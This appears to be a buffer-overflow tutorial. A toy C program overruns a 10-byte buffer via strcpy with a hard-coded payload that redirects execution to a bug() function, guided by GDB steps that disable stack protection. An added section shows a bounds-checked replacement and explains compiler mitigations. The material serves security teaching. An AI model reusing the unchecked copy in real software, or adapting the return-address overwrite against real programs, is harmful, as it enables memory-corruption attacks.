Attack Code:
#include <stdio.h>
#include <string.h>

char code[] =
    "\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41"
    "\x41\x41\x41"
    "\x41\x41\x41\x41"
    "\x41\x41"              // two more added (padding up to the saved return address)
    "\xbe\x05\x40\x00"      // bug address (read from GDB, see step 3 below)
    "\x00";

void copy(const char *input)
{
    char buf[10];
    strcpy(buf, input);     // no bounds check: input longer than 10 bytes overruns buf
    printf("%s\n", buf);
}

void bug(void)
{
    printf("I shouldn't have appeared\n");
}

int main(int argc, char *argv[])
{
    copy(code);
    return 0;
}
Attack Process:
1. Compile with stack protection turned off, then open the program in GDB.
2. Set breakpoints at both strcpy and printf, run, view the value of the RSP register, and find the address where strcpy is located.
3. After running, view the address of bug; this is the value placed in the payload as the bug address.
4. Run the program to carry out the attack.
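The defect the steps above exploit is the unchecked strcpy into a 10-byte buffer in copy(). The following is an added example, not code from the page or its sources: it reproduces that copy() for contrast and places a bounds-checked replacement beside it, together with a small helper that reports how far a given input would write past the buffer. The names BUF_SIZE, bounded_len, safe_copy and overrun_bytes are this example's own, and the oversized input is constructed here (28 bytes of 'A', the length of the page's payload of 24 padding bytes plus a 4-byte address).

```c
/* Added example (not from the original page): the page's copy() pattern
   next to a bounds-checked replacement. All names here are the example's
   own assumptions, not identifiers from the page. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 10   /* same destination size as the page's char buf[10] */

/* How many bytes strcpy(buf, input) would write past a buf_size-byte buffer
   (the NUL terminator counts). 0 means the copy stays in bounds. */
size_t overrun_bytes(const char *input, size_t buf_size)
{
    size_t needed = strlen(input) + 1;
    return needed > buf_size ? needed - buf_size : 0;
}

/* Length of s, never looking further than max bytes, so an input that is
   not NUL-terminated cannot make the caller read past it. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened replacement for the page's copy(): copies only when the input
   and its terminator fit in dst_size bytes. Returns 0 on success; on an
   oversized input it returns -1 and leaves dst as an empty string rather
   than silently truncating, so a partial copy is never mistaken for data. */
int safe_copy(char *dst, size_t dst_size, const char *input)
{
    size_t len;
    if (dst_size == 0)
        return -1;
    len = bounded_len(input, dst_size);
    if (len >= dst_size) {          /* no room left for the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, input, len + 1);    /* len + 1 <= dst_size, includes the NUL */
    return 0;
}

/* The page's vulnerable copy(), kept only for contrast; never called here. */
void copy(const char *input)
{
    char buf[BUF_SIZE];
    strcpy(buf, input);             /* writes strlen(input) + 1 bytes, unchecked */
    printf("%s\n", buf);
}

int main(void)
{
    /* Constructed input: 28 'A's, the length of the page's payload
       (24 bytes of padding plus a 4-byte address). */
    char oversized[29];
    char buf[BUF_SIZE];
    int rc;

    memset(oversized, 'A', 28);
    oversized[28] = '\0';

    printf("bytes strcpy would write past buf: %zu\n",
           overrun_bytes(oversized, BUF_SIZE));

    rc = safe_copy(buf, sizeof buf, oversized);
    printf("safe_copy(oversized) -> %d, buf=\"%s\"\n", rc, buf);

    rc = safe_copy(buf, sizeof buf, "hello");
    printf("safe_copy(\"hello\")   -> %d, buf=\"%s\"\n", rc, buf);
    return 0;
}
```

Step 1 of the procedure disables the compiler's stack protector; with GCC's default `-fstack-protector` left on, the overrun of buf is detected when copy() returns, and building with `-O2 -D_FORTIFY_SOURCE=2` additionally turns this strcpy into a checked call because the size of buf is known at compile time. Those are mitigations, not fixes: the length check in safe_copy is what removes the bug.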
Resources:
http://os.it168.com/a2009/0530/1059/000001059910.shtml
http://blog.csdn.net/liigo/article/details/582231
http://blog.163.com/jw_chen_cs/blog/static/20221214820124119642246/
Buffer overflow attack